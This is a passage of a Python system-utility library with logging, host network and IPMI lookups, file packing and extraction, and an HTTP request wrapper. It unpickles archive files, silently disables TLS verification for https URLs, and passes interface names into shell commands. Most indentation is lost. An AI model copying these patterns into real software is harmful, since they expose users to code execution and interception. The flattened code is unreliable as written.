if screen is True or (screen is None and self.screen is True):
self.Screen(log_str,log_level)
# Send Log Data to logging function (self.log_file)
   if log_file is None:
    self.Function(log_str,direct=direct,log_level=log_level,func_name=func_name,date_format=date_format)
 def Function(self,*msg,**opts):
  if type(self.log_file).__name__ == 'function':
   # these values used to be read from Log()'s scope and were undefined here
   log_str=msg[0] if msg else ''
   direct=opts.get('direct',False)
   log_level=opts.get('log_level',3)
   func_name=opts.get('func_name',None)
   date_format=opts.get('date_format',self.date_format)
   log_func_arg=get_function_args(self.log_file,mode='all')
if 'args' in log_func_arg or 'varargs' in log_func_arg:
log_p=True
args=log_func_arg.get('args',[])
if args and len(args) <= 4 and ('direct' in args or 'log_level' in args or 'func_name' in args):
tmp=[]
for i in range(0,len(args)):
tmp.append(i)
if 'direct' in args:
didx=args.index('direct')
del tmp[didx]
args[didx]=direct
if 'log_level' in args:
lidx=args.index('log_level')
del tmp[lidx]
args[lidx]=log_level
if 'func_name' in args:
lidx=args.index('func_name')
del tmp[lidx]
args[lidx]=func_name
if 'date_format' in args:
lidx=args.index('date_format')
del tmp[lidx]
args[lidx]=date_format
args[tmp[0]]=log_str
self.log_file(*args)
elif 'keywards' in log_func_arg:
self.log_file(log_str,direct=direct,log_level=log_level,func_name=func_name,date_format=date_format)
elif 'defaults' in log_func_arg:
if 'direct' in log_func_arg['defaults'] and 'log_level' in log_func_arg['defaults']:
self.log_file(log_str,direct=direct,log_level=log_level)
elif 'log_level' in log_func_arg['defaults']:
self.log_file(log_str,log_level=log_level)
elif 'direct' in log_func_arg['defaults']:
self.log_file(log_str,direct=direct)
else:
self.log_file(log_str)
else:
self.log_file(log_str)
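# Minimal LOG usage sketch (paths and values are illustrative):
#   log=LOG(path='/tmp',log_file='app.log',screen=True)
#   log.Log('started',log_level=1)                      # within limit(3): printed and appended to /tmp/app.log
#   log.Log('bad thing',log_level=1,filename='err.log') # routed to /tmp/err.log instead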
class HOST:
def __init__(self):
pass
def Name(self):
return socket.gethostname()
def NetIp(self,ifname):
if os.path.isdir('/sys/class/net/{}'.format(ifname)) is False:
return False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
return
def Ip(self,ifname=None,mac=None,default=None):
if mac is None : mac=self.Mac()
if ifname is None: ifname=get_dev_name_from_mac(mac)
ip=self.NetIp(ifname)
if ip: return ip
return socket.gethostbyname(socket.gethostname())
def IpmiIp(self,default=None):
rt=SHELL().Run('''ipmitool lan print 2>/dev/null| grep "IP Address" | grep -v Source | awk '{print $4}' ''')
if rt[0]:return rt[1]
return default
def IpmiMac(self,default=None):
rt=SHELL().Run(""" ipmitool lan print 2>/dev/null | grep "MAC Address" | awk """ + """ '{print $4}' """)
if rt[0]:return rt[1]
return default
def DevMac(self,ifname,default=None):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
   return ':'.join(['%02x' % (char if isinstance(char,int) else ord(char)) for char in info[18:24]]) # bytes yield ints on Python3
except:
return default
def Mac(self,ip=None,dev=None,default=None):
if IP(ip).IsV4():
dev_info=self.NetDevice()
for dev in dev_info.keys():
if self.NetIp(dev) == ip:
return dev_info[dev]['mac']
elif dev:
return self.DevMac(dev)
else:
#return ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return CONVERT('%012x' % uuid.getnode()).Str2Mac()
return default
def DevName(self,mac=None,default=None):
if mac is None:
mac=self.Mac()
net_dir='/sys/class/net'
if isinstance(mac,str) and os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
for dev in dirnames:
fmac=cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True)
if isinstance(fmac,str) and fmac.strip().lower() == mac.lower():
return dev
return default
 def NetIP(self,ifname,default=None):
if not os.path.isdir('/sys/class/net/{}'.format(ifname)):
return default
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
pass
return default
def Info(self):
return {
'host_name':self.Name(),
'host_ip':self.Ip(),
'host_mac':self.Mac(),
'ipmi_ip':self.IpmiIp(),
'ipmi_mac':self.IpmiMac(),
}
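 # Usage sketch: HOST().Info() returns something like
 #   {'host_name':'node1','host_ip':'192.0.2.10','host_mac':'aa:bb:cc:dd:ee:ff',
 #    'ipmi_ip':'192.0.2.110','ipmi_mac':'aa:bb:cc:dd:ee:fe'}
 # (values are illustrative; the IPMI fields need ipmitool and may come back as None)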
def NetDevice(self,name=None):
net_dev={}
net_dir='/sys/class/net'
if os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
if name:
if name in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,name))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[name]={
'mac':cat('{}/{}/address'.format(dirpath,name),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,name),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,name),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,name),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,name),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,name),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,name),no_end_newline=True),
}
else:
for dev in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,dev))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[dev]={
'mac':cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,dev),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,dev),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,dev),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,dev),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,dev),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,dev),no_end_newline=True),
}
return net_dev
else:
return False
def Alive(self,ip,keep=20,interval=3,timeout=1800,default=False,log=None,cancel_func=None):
return IP(ip).Online(keep=keep,interval=interval,timeout=timeout,default=default,log=log,cancel_func=cancel_func)[1]
def Ping(self,ip,keep_good=10,timeout=3600):
  return IP(ip).Ping(keep_good=keep_good,timeout=timeout)
class FILE:
 '''
 sub_dir : True (get files recursively through sub-directories)
 data : True (read each file's data into the DB)
 md5sum : True (compute each file's MD5 sum)
 link2file: True (store the link target's real data instead of the sym-link)
 '''
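 # Usage sketch (assumes a readable './pkg' directory; names are illustrative):
 #   fs=FILE('./pkg',sub_dir=True,data=True,md5sum=True)   # scan the tree into fs.info
 #   fs.Save('/tmp/pkg.kf')                                # pack the info DB into one file
 #   f2=FILE(); f2.Open('/tmp/pkg.kf'); f2.Extract(dest='/tmp/out')  # unpack elsewhere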
def __init__(self,*inp,**opts):
self.root_path=opts.get('root_path',None)
#if self.root_path is None: self.root_path=os.path.dirname(os.path.abspath(__file__))
if self.root_path is None: self.root_path=self.Path()
info=opts.get('info',None)
if isinstance(info,dict):
self.info=info
else:
self.info={}
sub_dir=opts.get('sub_dir',opts.get('include_sub_dir',opts.get('include_dir',False)))#???
data=opts.get('data',False)
md5sum=opts.get('md5sum',False)
link2file=opts.get('link2file',False) # If True then copy file-data of sym-link file, so get it real file instead of sym-link file
self.filelist={}
for filename in inp:
root,flist=self.FileList(filename,sub_dir=sub_dir,dirname=True)
if root not in self.filelist: self.filelist[root]=[]
self.filelist[root]=self.filelist[root]+flist
for ff in self.filelist:
self.info.update(self.Get(ff,*self.filelist[ff],data=data,md5sum=md5sum,link2file=link2file))
def FileList(self,name,sub_dir=False,dirname=False,default=[]):
if isinstance(name,str):
if name[0] == '/': # Start from root path
if os.path.isfile(name) or os.path.islink(name): return os.path.dirname(name),[os.path.basename(name)]
if os.path.isdir(name):
if sub_dir:
rt = []
pwd=os.getcwd()
os.chdir(name)
for base, dirs, files in os.walk('.'):
if dirname: rt.extend(os.path.join(base[2:], d) for d in dirs)
rt.extend(os.path.join(base[2:], f) for f in files)
os.chdir(pwd)
return Path(name),rt
else:
return Path(name),[f for f in os.listdir(name)]
elif self.root_path: # start from defined root path
#chk_path=os.path.join(self.root_path,name)
chk_path=Path(self.root_path,name)
if os.path.isfile(chk_path) or os.path.islink(chk_path): return Path(self.root_path),[name]
if os.path.isdir(chk_path):
if sub_dir:
rt = []
pwd=os.getcwd()
os.chdir(self.root_path) # Going to defined root path
    # Get the recursive file list under name ('.' means the current dir)
for base, dirs, files in os.walk(name):
if dirname: rt.extend(os.path.join(base[2:], d) for d in dirs)
rt.extend(os.path.join(base[2:], f) for f in files)
os.chdir(pwd) # recover to the original path
return Path(self.root_path),rt
else:
if name == '.': name=''
return Path(self.root_path),[os.path.join(name,f) for f in os.listdir('{}/{}'.format(self.root_path,name))]
return default
def CdPath(self,base,path):
rt=base
for ii in path.split('/'):
if ii not in rt: return False
rt=rt[ii]
return rt
def FileName(self,filename):
if isinstance(filename,str):
filename_info=os.path.basename(filename).split('.')
if 'tar' in filename_info:
idx=filename_info.index('tar')
else:
idx=-1
return '.'.join(filename_info[:idx]),'.'.join(filename_info[idx:])
return None,None
def FileType(self,filename,default=False):
if not isinstance(filename,str) or not os.path.isfile(filename): return default
  with open(filename,'rb') as f: aa=magic.from_buffer(f.read(2048))
if aa: return aa.split()[0].lower()
return 'unknown'
def GetInfo(self,path=None,*inps):
if isinstance(path,str):
   if not self.info and os.path.exists(path):
    # MkInfo() only exists inside Get(), so build the same info record inline from os.stat
    st=os.stat(path)
    data={' i ':{'exist':True,'size':st.st_size,'mode':oct(st.st_mode)[-4:],'atime':st.st_atime,'mtime':st.st_mtime,'ctime':st.st_ctime,'gid':st.st_gid,'uid':st.st_uid}}
   else:
    data=self.CdPath(self.info,path)
if isinstance(data,dict):
if not inps and ' i ' in data: return data[' i ']
rt=[]
for ii in inps:
if ii == 'data' and ii in data: rt.append(data[ii])
if ' i ' in data and ii in data[' i ']: rt.append(data[' i '][ii])
return rt
def Get(self,root_path,*filenames,**opts):
data=opts.get('data',False)
md5sum=opts.get('md5sum',False)
link2file=opts.get('link2file',False)
base={}
def MkInfo(rt,filename=None,**opts):
#if not isinstance(rt,dict) or not isinstance(filename,str): return default
if ' i ' not in rt: rt[' i ']={}
if filename:
state=os.stat(filename)
rt[' i ']['exist']=True
rt[' i ']['size']=state.st_size
rt[' i ']['mode']=oct(state.st_mode)[-4:]
rt[' i ']['atime']=state.st_atime
rt[' i ']['mtime']=state.st_mtime
rt[' i ']['ctime']=state.st_ctime
rt[' i ']['gid']=state.st_gid
rt[' i ']['uid']=state.st_uid
if opts: rt[' i '].update(opts)
def MkPath(base,path,root_path):
rt=base
chk_dir='{}'.format(root_path)
for ii in path.split('/'):
if ii:
chk_dir=Path(chk_dir,ii)
if ii not in rt:
rt[ii]={}
if os.path.isdir(chk_dir): MkInfo(rt[ii],chk_dir,type='dir')
rt=rt[ii]
return rt
for filename in filenames:
tfilename=Path(root_path,filename)
if os.path.exists(tfilename):
rt=MkPath(base,filename,root_path)
if os.path.islink(tfilename): # it is a Link File
    if os.path.isfile(tfilename): # check the resolved full path, not the relative name
if link2file:
name,ext=self.FileName(tfilename)
_md5=None
if data or md5sum: # MD5SUM or Data
filedata=self.Rw(tfilename,out='byte')
if filedata[0]:
if data: rt['data']=filedata[1]
if md5sum: _md5=md5(filedata[1])
MkInfo(rt,filename=tfilename,type=self.FileType(tfilename),name=name,ext=ext,md5=_md5)
else:
MkInfo(rt,filename=tfilename,type='link',dest=os.readlink(tfilename))
elif os.path.isdir(tfilename): # it is a directory
MkInfo(rt,tfilename,type='dir')
elif os.path.isfile(tfilename): # it is a File
name,ext=self.FileName(tfilename)
_md5=None
if data or md5sum: # MD5SUM or Data
filedata=self.Rw(tfilename,out='byte')
if filedata[0]:
if data: rt['data']=filedata[1]
if md5sum: _md5=md5(filedata[1])
MkInfo(rt,filename=tfilename,type=self.FileType(tfilename),name=name,ext=ext,md5=_md5)
else:
MkInfo(rt,filename,exist=False)
if base:
return {root_path:base}
return {}
def GetInfoFile(self,name,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
if isinstance(name,str):
for root in roots:
rt=self.info.get(root,{})
for ii in name.split('/'):
if ii not in rt: break
rt=rt[ii]
fileinfo=rt.get(' i ',{})
if fileinfo: return fileinfo
return False
def GetList(self,name=None,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
for root in roots:
if isinstance(root,str):
rt=self.info.get(root,{})
if name != root:
rt=self.CdPath(rt,name)
if isinstance(rt,dict):
for ii in rt:
if ii == ' i ': continue
if rt[ii].get(' i ',{}).get('type') == 'dir':
print(ii+'/')
else:
print(ii)
return False
def GetFileList(self,name=None,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
for root in roots:
if isinstance(root,str):
rt=self.info.get(root,{})
if name != root:
rt=self.CdPath(rt,name)
if isinstance(rt,dict):
for ii in rt:
if ii == ' i ': continue
if rt[ii].get(' i ',{}).get('type') == 'dir': continue
print(ii)
return False
 def ExecFile(self,filename,bin_name=None,default=None,work_path='/tmp'):
  # check whether filename is an executable in the system bin path and return the file name
  # if it is a compressed file, extract it and look for bin_name inside the extracted directory,
  # returning the path(s) of any executable binary found
  # if filename itself is an executable file, return the file path
  # if nothing is found, return the default value
  exist=self.GetInfoFile(filename)
  if exist:
   # mode is stored as a 4-digit octal string (see MkInfo()), so compare against '0755'
   if exist['type'] in ['elf'] and exist['mode'] == '0755':return filename
   if self.Extract(filename,dest=work_path):
    if bin_name:
     rt=[]
     # search the extraction area with a fresh FILE() since Find() walks self.root_path
     for ff in FILE(root_path=work_path).Find(bin_name):
      if os.access(ff,os.X_OK):
       rt.append(ff)
     return rt
  else:
   if find_executable(filename): return filename
  return default
def Basename(self,filename,default=False):
if isinstance(filename,str):return os.path.basename(filename)
return default
def Dirname(self,filename,bin_name=None,default=False):
if not isinstance(filename,str): return default
if bin_name is None: return os.path.dirname(filename)
if not isinstance(bin_name,str): return default
bin_info=bin_name.split('/')
bin_n=len(bin_info)
filename_info=filename.split('/')
filename_n=len(filename_info)
for ii in range(0,bin_n):
if filename_info[filename_n-1-ii] != bin_info[bin_n-1-ii]: return default
return '/'.join(filename_info[:-bin_n])
def Find(self,filename,default=[]):
if not isinstance(filename,str): return default
filename=os.path.basename(filename)
if os.path.isdir(self.root_path):
rt = []
for base, dirs, files in os.walk(self.root_path):
found = fnmatch.filter(files, filename)
rt.extend(os.path.join(base, f) for f in found)
return rt
return default
# def Decompress(self,filename,work_path='/tmp',info={},del_org_file=False):
# if not info and isinstance(filename,str) and os.path.isfile(filename): info=self.Get(filename)
# filetype=info.get('type',None)
# fileext=info.get('ext',None)
# if filetype and fileext:
# # Tar stuff
# if fileext in ['tgz','tar','tar.gz','tar.bz2','tar.xz'] and filetype in ['gzip','tar','bzip2','lzma','xz','bz2']:
# tf=tarfile.open(filename)
# tf.extractall(work_path)
# tf.close()
# elif fileext in ['zip'] and filetype in ['compress']:
# with zipfile.ZipFile(filename,'r') as zf:
# zf.extractall(work_path)
# if del_org_file: os.unline(filename)
# return True
# return False
def Rw(self,name,data=None,out='byte',append=False,read=None,overwrite=True,finfo={}):
if isinstance(name,str):
if data is None: # Read from file
if os.path.isfile(name):
try:
if read in ['firstread','firstline','first_line','head','readline']:
with open(name,'rb') as f:
data=f.readline()
else:
with open(name,'rb') as f:
data=f.read()
if out in ['string','str']:
return True,CONVERT(data).Str()
else:
return True,data
except:
pass
return False,'File({}) not found'.format(name)
else: # Write to file
file_path=os.path.dirname(name)
if not file_path or os.path.isdir(file_path): # current dir or correct directory
# try:
if append:
with open(name,'ab') as f:
f.write(BYTES().From(data))
else:
with open(name,'wb') as f:
f.write(BYTES().From(data))
if isinstance(finfo,dict) and finfo: self.SetIdentity(name,**finfo)
#mode=self.Mode(mode)
#if mode: os.chmod(name,int(mode,base=8))
#if uid and gid: os.chown(name,uid,gid)
#if mtime and atime: os.utime(name,(atime,mtime))# Time update must be at last order
return True,None
# except:
# pass
return False,'Directory({}) not found'.format(file_path)
return False,'Unknown type({}) filename'.format(name)
def Mode(self,val,default=False):
if isinstance(val,int):
#if val >= 32768: # stat
if val > 511:
return oct(val)[-4:]
elif val > 63: # mask
return oct(val)
elif isinstance(val,str):
try:
cnt=len(val)
val=int(val)
if cnt >=3 and cnt <=4 and val >= 100 and val <= 777: # string type of permission number
return '%04d'%(val)
#return int(val,8)
except: # permission string
if len(val) != 9: return 'Bad permission length'
if not all(val[k] in 'rw-' for k in [0,1,3,4,6,7]): return 'Bad permission format (read-write)'
if not all(val[k] in 'xs-' for k in [2,5]): return 'Bad permission format (execute)'
if val[8] not in 'xt-': return 'Bad permission format (execute other)'
m = 0
if val[0] == 'r': m |= stat.S_IRUSR
if val[1] == 'w': m |= stat.S_IWUSR
if val[2] == 'x': m |= stat.S_IXUSR
if val[2] == 's': m |= stat.S_IXUSR | stat.S_ISUID
if val[3] == 'r': m |= stat.S_IRGRP
if val[4] == 'w': m |= stat.S_IWGRP
if val[5] == 'x': m |= stat.S_IXGRP
if val[5] == 's': m |= stat.S_IXGRP | stat.S_ISGID
if val[6] == 'r': m |= stat.S_IROTH
if val[7] == 'w': m |= stat.S_IWOTH
if val[8] == 'x': m |= stat.S_IXOTH
if val[8] == 't': m |= stat.S_IXOTH | stat.S_ISVTX
return oct(m)
return default
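 # Mode() conversion sketch:
 #   FILE().Mode(33261)       -> '0755' (raw st_mode int)
 #   FILE().Mode('755')       -> '0755' (permission number string)
 #   FILE().Mode('rwxr-xr-x') -> oct(0o755), i.e. '0o755' on Python3 ('0755' on Python2)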
# Find filename's root path and filename according to the db
def FindRP(self,filename=None,default=None):
if isinstance(filename,str) and self.info:
info_keys=list(self.info.keys())
info_num=len(info_keys)
if filename[0] != '/':
if info_num == 1: return info_keys[0]
return self.root_path
aa='/'
filename_a=filename.split('/')
for ii in range(1,len(filename_a)):
aa=Path(aa,filename_a[ii])
if aa in info_keys:
remain_path='/'.join(filename_a[ii+1:])
if info_num == 1: return aa,remain_path
# if info has multi root path then check filename in the db of each root_path
if self.GetInfoFile(remain_path,aa): return aa,remain_path
elif self.info:
return list(self.info.keys())
return default
def ExtractRoot(self,**opts):
root_path=opts.get('root_path',[])
dirpath=opts.get('dirpath')
sub_dir=opts.get('sub_dir',False)
if isinstance(root_path,str):
root_path=[root_path]
#if not os.path.isdir(opts.get('dest')): os.makedirs(opts.get('dest'))
if self.Mkdir(opts.get('dest'),force=True) is False: return False
for rp in root_path:
new_dest=opts.get('dest')
if dirpath:
rt=self.CdPath(self.info[rp],dirpath)
if rt is False:
print('{} not found'.format(dirpath))
return
else:
dirpath=''
rt=self.info[rp]
rinfo=rt.get(' i ',{})
rtype=rinfo.get('type')
#dir:directory,None:root directory
if rtype not in ['dir',None]: # File / Link
mydest=os.path.dirname(dirpath)
myname=os.path.basename(dirpath)
if mydest:
mydest=os.path.join(new_dest,mydest)
else:
mydest=new_dest
#if not os.path.isdir(mydest): os.makedirs(mydest)
if self.Mkdir(mydest,force=True,info=rinfo) is False: return False
if rtype == 'link':
os.symlink(rinfo['dest'],os.path.join(mydest,myname))
self.SetIdentity(os.path.join(mydest,myname),**rinfo)
else: # File
if 'data' in rt: self.Rw(Path(mydest,myname),data=rt['data'],finfo=rinfo)
    else: print('{} file has no data'.format(dirpath))
# self.SetIdentity(os.path.join(mydest,myname),**rinfo)
else: # directory or root DB
for ii in rt:
if ii == ' i ': continue
finfo=rt[ii].get(' i ',{})
ftype=finfo.get('type')
if ftype == 'dir':
mydir=os.path.join(new_dest,ii)
self.Mkdir(mydir,force=True,info=finfo)
#self.SetIdentity(mydir,**finfo)
# Sub directory
if sub_dir: self.ExtractRoot(dirpath=os.path.join(dirpath,ii),root_path=rp,dest=os.path.join(new_dest,ii),sub_dir=sub_dir)
#if dmtime and datime: os.utime(mydir,(datime,dmtime)) # Time update must be at last order
elif ftype == 'link':
iimm=os.path.join(new_dest,ii)
if not os.path.exists(iimm):
os.symlink(finfo['dest'],iimm)
self.SetIdentity(iimm,**finfo)
else: # File
if 'data' in rt[ii]: self.Rw(os.path.join(new_dest,ii),data=rt[ii]['data'],finfo=finfo)
     else: print('{} file has no data'.format(ii))
def Mkdir(self,path,force=False,info={}):
if not isinstance(path,str): return None
if os.path.exists(path): return None
if force:
try:
os.makedirs(path)
if isinstance(info,dict) and info: self.SetIdentity(path,**info)
except:
return False
else:
try:
os.mkdir(path)
if isinstance(info,dict) and info: self.SetIdentity(path,**info)
except:
return False
return True
def MkTemp(self,filename=None,suffix='-XXXXXXXX',opt='dry',base_dir='/tmp',custom=None):
if filename is None:
filename=os.path.join(base_dir,Random(length=len(suffix)-1,strs=custom,mode='str'))
dir_name=os.path.dirname(filename)
file_name=os.path.basename(filename)
name, ext = os.path.splitext(file_name)
if type(suffix) is not str:
suffix='-XXXXXXXX'
num_type='.%0{}d'.format(len(suffix)-1)
if dir_name == '.':
dir_name=os.path.dirname(os.path.realpath(__file__))
elif dir_name == '':
dir_name=base_dir
def new_name(name,ext=None,ext2=None):
if ext:
if ext2:
return '{}{}{}'.format(name,ext,ext2)
return '{}{}'.format(name,ext)
if ext2:
return '{}{}'.format(name,ext2)
return name
def new_dest(dest_dir,name,ext=None):
if os.path.isdir(dest_dir) is False:
return False
i=0
new_file=new_name(name,ext)
while True:
rfile=os.path.join(dest_dir,new_file)
if os.path.exists(rfile) is False:
return rfile
if suffix:
if '0' in suffix or 'n' in suffix or 'N' in suffix:
if suffix[-1] not in ['0','n']:
new_file=new_name(name,num_type%i,ext)
else:
new_file=new_name(name,ext,num_type%i)
elif 'x' in suffix or 'X' in suffix:
rnd_str='.{}'.format(Random(length=len(suffix)-1,mode='str'))
if suffix[-1] not in ['X','x']:
new_file=new_name(name,rnd_str,ext)
else:
new_file=new_name(name,ext,rnd_str)
else:
if i == 0:
new_file=new_name(name,ext,'.{}'.format(suffix))
else:
new_file=new_name(name,ext,'.{}.{}'.format(suffix,i))
else:
new_file=new_name(name,ext,'.{}'.format(i))
i+=1
  new_dest_file=new_dest(dir_name,name,ext)
  if opt in ['file','f']:
   os.mknod(new_dest_file)
  elif opt in ['dir','d','directory']:
   os.mkdir(new_dest_file)
  return new_dest_file
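 # MkTemp() sketch: with opt='dry' (default) it only proposes an unused name, e.g.
 #   FILE().MkTemp('/tmp/job.log')            -> '/tmp/job.log' (or '/tmp/job.log.<rand>' if taken)
 #   FILE().MkTemp(suffix='-XXXX',opt='dir')  -> creates and returns a random /tmp directory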
def SetIdentity(self,path,**opts):
if os.path.exists(path):
chmod=self.Mode(opts.get('mode',None))
uid=opts.get('uid',None)
gid=opts.get('gid',None)
atime=opts.get('atime',None)
mtime=opts.get('mtime',None)
try:
if chmod: os.chmod(path,int(chmod,base=8))
if uid and gid: os.chown(path,uid,gid)
if mtime and atime: os.utime(path,(atime,mtime)) # Time update must be at last order
except:
pass
def Extract(self,*path,**opts):
dest=opts.get('dest',None)
root_path=opts.get('root_path',None)
sub_dir=opts.get('sub_dir',False)
if dest is None: return False
if not path:
self.ExtractRoot(root_path=self.FindRP(),dest=dest,sub_dir=sub_dir)
else:
for filepath in path:
fileRF=self.FindRP(filepath)
if isinstance(fileRF,tuple):
root_path=[fileRF[0]]
filename=fileRF[1]
self.ExtractRoot(root_path=root_path,dirpath=filename,dest=dest,sub_dir=sub_dir)
    elif isinstance(fileRF,list):
     self.ExtractRoot(root_path=fileRF,dest=dest,sub_dir=sub_dir)
  return True # report success so callers like ExecFile() can gate on it
def Save(self,filename):
pv=b'3'
if PyVer(2): pv=b'2'
#self.Rw(filename,data=pv+bz2.compress(pickle.dumps(self.info,protocol=2)))
self.Rw(filename,data=pv+Compress(pickle.dumps(self.info,protocol=2),mode='lz4'))
def Open(self,filename):
if not os.path.isfile(filename):
print('{} not found'.format(filename))
return False
data=self.Rw(filename)
if data[0]:
   pv=data[1][0:1] # slice (not index) so the tag stays bytes on Python3
   if pv == b'3' and PyVer(2):
print('The data version is not matched. Please use Python3')
return False
# decompress data
try:
#dcdata=bz2.BZ2Decompressor().decompress(data[1][1:])
dcdata=Decompress(data[1][1:],mode='lz4')
except:
print('This is not KFILE format')
return False
try:
self.info=pickle.loads(dcdata) # Load data
except:
try:
self.info=pickle.loads(dcdata,encoding='latin1') # Convert 2 to 3 format
except:
print('This is not KFILE format')
return False
else:
print('Can not read {}'.format(filename))
return False
def Cd(self,data,path,sym='/'):
if Type(data,'module') and data == os:
if isinstance(path,str):
data.chdir(path)
return data
else:
if isinstance(path,int): path='{}'.format(path)
for ii in path.split(sym):
if isinstance(data,dict):
if ii in data:
data=data[ii]
elif isinstance(data,(list,tuple)):
if not isinstance(ii,str) or not ii.isdigit(): continue
ii=int(ii)
if len(data) > ii:
data=data[ii]
return data
 def Path(self,filename=None):
  if filename:
   return os.path.dirname(os.path.realpath(filename))
return os.path.dirname(os.path.realpath((inspect.stack()[-1])[1]))
#if '__file__' in globals() : return os.path.dirname(os.path.realpath(__file__))
def Rm(self,filelist):
if isinstance(filelist,str):
filelist=filelist.split(',')
if isinstance(filelist,(list,tuple)):
for ii in list(filelist):
if os.path.isfile(ii):
os.unlink(ii)
else:
print('not found {0}'.format(ii))
class WEB:
def __init__(self,request=None):
if request:
self.requests=request
else:
self.requests=requests
def Session(self):
return self.requests.session._get_or_create_session_key()
def ClientIp(self):
x_forwarded_for = self.requests.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = self.requests.META.get('REMOTE_ADDR')
return ip
def ServerIp(self):
return self.requests.get_host().split(':')
def Request(self,host_url,**opts):
# remove SSL waring error message (test)
self.requests.packages.urllib3.disable_warnings()
mode=opts.get('mode','get')
max_try=opts.get('max_try',3)
auth=opts.get('auth',None)
user=opts.get('user',None)
ip=opts.get('ip',None)
port=opts.get('port',None)
passwd=opts.get('passwd',None)
timeout=opts.get('timeout',None)
https=opts.get('https',False)
verify=opts.get('verify',True)
request_url=opts.get('request_url',None)
log=opts.get('log',None)
log_level=opts.get('log_level',8)
logfile=opts.get('logfile',None)
  do_ping=opts.get('ping',False) # renamed so it does not shadow the ping() helper used below
if https:
verify=False
if auth is None and user and passwd:
if type(user) is not str or type(passwd) is not str:
printf("user='<user>',passwd='<pass>' : format(each string)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"user='<user>',passwd='<pass>' : format(each string)"
auth=(user,passwd)
if auth and type(auth) is not tuple:
printf("auth=('<user>','<pass>') : format(tuple)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"auth=('<user>','<pass>') : format(tuple)"
data=opts.get('data',None) # dictionary format
if data and type(data) is not dict:
printf("data={'<key>':'<val>',...} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"data={'<key>':'<val>',...} : format(dict)"
json_data=opts.get('json',None) # dictionary format
if json_data and type(json_data) is not dict:
printf("data={'<key>':'<val>',...} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"json={'<key>':'<val>',...} : format(dict)"
files=opts.get('files',None) # dictionary format
if files and type(files) is not dict:
printf("files = { '<file parameter name>': (<filename>, open(<filename>,'rb'))} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"files = { '<file parameter name>': (<filename>, open(<filename>,'rb'))} : format(dict)"
if type(host_url) is str:
   chk_dest=re.compile(r'https?://([a-zA-Z0-9.-]*)[:/]').findall(host_url)
if len(chk_dest): chk_dest=chk_dest[0]
if host_url.find('https://') == 0:
verify=False
elif ip:
chk_dest='{}'.format(ip)
if verify:
host_url='http://{}'.format(ip)
else:
host_url='https://{}'.format(ip)
if port:
host_url='{}:{}'.format(host_url,port)
if request_url:
host_url='{}/{}'.format(host_url,request_url)
else:
return False,'host_url or ip not found'
  if do_ping and chk_dest:
   # ping() here is the module-level helper (assumed available in this kit)
   if not ping(chk_dest,timeout_sec=3):
    return False,'Can not access to destination({})'.format(chk_dest)
ss = self.requests.Session()
for j in range(0,max_try):
if mode == 'post':
try:
r =ss.post(host_url,verify=verify,auth=auth,data=data,files=files,timeout=timeout,json=json_data)
return True,r
except:
pass
else:
try:
r =ss.get(host_url,verify=verify,auth=auth,data=data,files=files,timeout=timeout,json=json_data)
return True,r
except:
pass
#except requests.exceptions.RequestException as e:
host_url_a=host_url.split('/')[2]
server_a=host_url_a.split(':')
if len(server_a) == 1:
printf("Server({}) has no response (wait {}/{} (10s))".format(server_a[0],j,max_try),dsp='e',log=log,log_level=log_level,logfile=logfile)
else:
printf("Server({}:{}) has no response (wait {}/{} (10s))".format(server_a[0],server_a[1],j,max_try),dsp='e',log=log,log_level=log_level,logfile=logfile)
TIME().Sleep(10)
return False,'TimeOut'
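 # Request() sketch (hypothetical endpoint; returns (ok,response) and retries with a 10s wait):
 #   ok,resp=WEB().Request('https://api.example.com/v1/status',auth=('user','pass'),timeout=10)
 #   if ok: print(resp.status_code)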
def str2url(self,string):
if string is None: return ''
if type(string) is str:
